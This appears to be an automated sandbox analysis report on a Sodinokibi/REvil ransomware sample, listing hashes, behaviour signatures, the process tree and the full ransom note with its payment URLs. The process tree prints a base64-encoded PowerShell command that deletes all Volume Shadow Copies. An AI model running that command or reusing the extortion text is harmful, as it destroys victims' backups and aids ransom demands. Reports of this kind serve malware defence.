Analysis

  • max time kernel
    139s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-08-2024 15:36

General

  • Target

    c34c7071510ec5f302b637b77e3474fb_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    c34c7071510ec5f302b637b77e3474fb

  • SHA1

    773100319f68d1affbb257d5024b10fcd4dec190

  • SHA256

    ad79de2dd0432073a560d310db6a7abbaf35f5d0ed94888b59399f6b7af94c1c

  • SHA512

    8ac3dc388714b07459b94401716d74eb0c6c68cab5800fe57fb5bfe8c9d6ec72feb5d27e18d81028ffb6cd547b1268f69054a2424053052d624460cc054e21e4

  • SSDEEP

    3072:EJMawtnGqtWoKeZC62aoNUSncVLJVUOLov:+w9vteQJYUocVLJVHL

Malware Config

Extracted

Path

C:\Users\n64410w-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension n64410w. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/40A95998EB849526 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/40A95998EB849526 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Gpm/jlSUMLXcRt81LW4szkZp0eWw1OWmqRUAqRUDdkcG0uYzOgWd9RLu59wipNRW uVtQrhEkgyTYvJej3ExsteAxUwAZB6e0S01xbRWm+tO9X0sFAJBH6SL+TGv9T8Xd g26dtptUOUTypx2wb2V4oww81/I9XLBODNkMEQ8ghx2l4AaKrqfZb/8YiTjgJGxr us87QO5BDUvxJJR/2QCBbPOnMbcj8/p2G8ibYlE3c3HxbtBdaXdfYKP+U3OHydfq jVNxZhJwhrRwADR8dUu3SYZ0yaKIbHFht7lsenPjFBrsSqgfeK7rXJGZxXlvFGpW cHlFmZCt2RcqjW2bTn409Ii96JBLc4FJtEykH4gJvhM+l0YIL0sbqA3Q8EfvQjC/ JL62QHo/z3nyIN+hVcti3kV8O7dks2tZekevpOY92vUrX/7jx5IXwNt/J5rJMhEU k8BtW7vGOSm27aRFngqAEFgQxGmn8bjiWy08SzOW4l4PsMcNm7Rs3Y3OfWS6OqA8 mk8yRZA/+AGu3eDYs/7XX0rh7Awsp3Cp7F9k7QAOe4Te7zC5ZFlKw8ELhyNXpcA7 139C2FtruFgVqFqNHcf4F+w2PvTRrcmP/TP/U8pjRzCjCVxP6h7Hl2Ve9ZnnG6NG kq/uBXY3VqvP9M5jvqGIrxf1FX/9GP93HKzEHY5h7Rd+vd1MHf/QqgGOfmA0tMGn aHOCuDD2XCtGaQQodiKZGn8BedG6vXFUWb7yq8Ia1pIZ69sOsrtPca/zuYK9rSoT 9xmuk+I4BlBNQlWL1gGltqv5mFnUiK33bqDKnzo1YFma0O+Q7B/n91V63Gk6V2Xb cXEPZMrU3KqdJFmUxNyuuYaAfQGU5y6M8PHxnfdpawe9OzU+Ner8eNgSVys2HMma RISMFVAsM0EUByvBTTnrN7/mf2iMbYO0Goocv5Q4IxRqC2czAL6SmbypoEruOX3L e0GS7xFbxdcExnZadVK69F4CqY1Pl83JC6uOz6QjVZYdI93IyKbsZLLaPOLcLJYS dobE9g+4BWunPhMzqHbgxfnraqmc2IS00PnG80l9hz2JGNJupzJO0lt7xOrIE695 9VGGkTjNXo6m+H9nYvHdstW86r54snMLgxvjeeGiQE43OWba0RsneVL/zNt0sfX7 iIq5LYsc+loHQnnjgvKjy9GIZLDd3MYZpERmCRHLo5iAP8Vkw4cLwbNXyVdgkgh+ NvOye4upqH12gKHpmZUR4YmFpBsZbAPoMcrBPjRQY9rL3N3mpcpn1NmjimGN10uG SocnKVuppMyd2ZWFadL2RhnjZv0jYNQ5ISp7snVd02m90Jb8lEP642TdQPfTAx7k tGbqsj6JhS4etBBZ6wLKDfghcm1SPb6eSDgoE8i2QOMxnblQuXEFQQ== Extension name: n64410w ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/40A95998EB849526

http://decryptor.cc/40A95998EB849526

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 15 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c34c7071510ec5f302b637b77e3474fb_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\c34c7071510ec5f302b637b77e3474fb_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2332
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1180
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2620

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t13tyl5x.jng.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\n64410w-readme.txt

      Filesize

      7KB

      MD5

      1f046895a52326935ce5400ac9bf54a8

      SHA1

      df1c85a75950f107ef26f388638cc240bb720a66

      SHA256

      ff3b58c56680d41b6e3a758f9b7f66817d6afb3a198537901d77a3071db94273

      SHA512

      e0e74e65fb8dd595c01b34a968e98b633cbcaacb198ca47ff5f796ffd92551401864e08e20f679868e699f7e063e9f7cfab2529086f1c016a990b42d769283c6

    • memory/2332-0-0x00007FFD36A43000-0x00007FFD36A45000-memory.dmp

      Filesize

      8KB

    • memory/2332-1-0x000001DCCCD70000-0x000001DCCCD92000-memory.dmp

      Filesize

      136KB

    • memory/2332-11-0x00007FFD36A40000-0x00007FFD37501000-memory.dmp

      Filesize

      10.8MB

    • memory/2332-12-0x00007FFD36A40000-0x00007FFD37501000-memory.dmp

      Filesize

      10.8MB

    • memory/2332-15-0x00007FFD36A40000-0x00007FFD37501000-memory.dmp

      Filesize

      10.8MB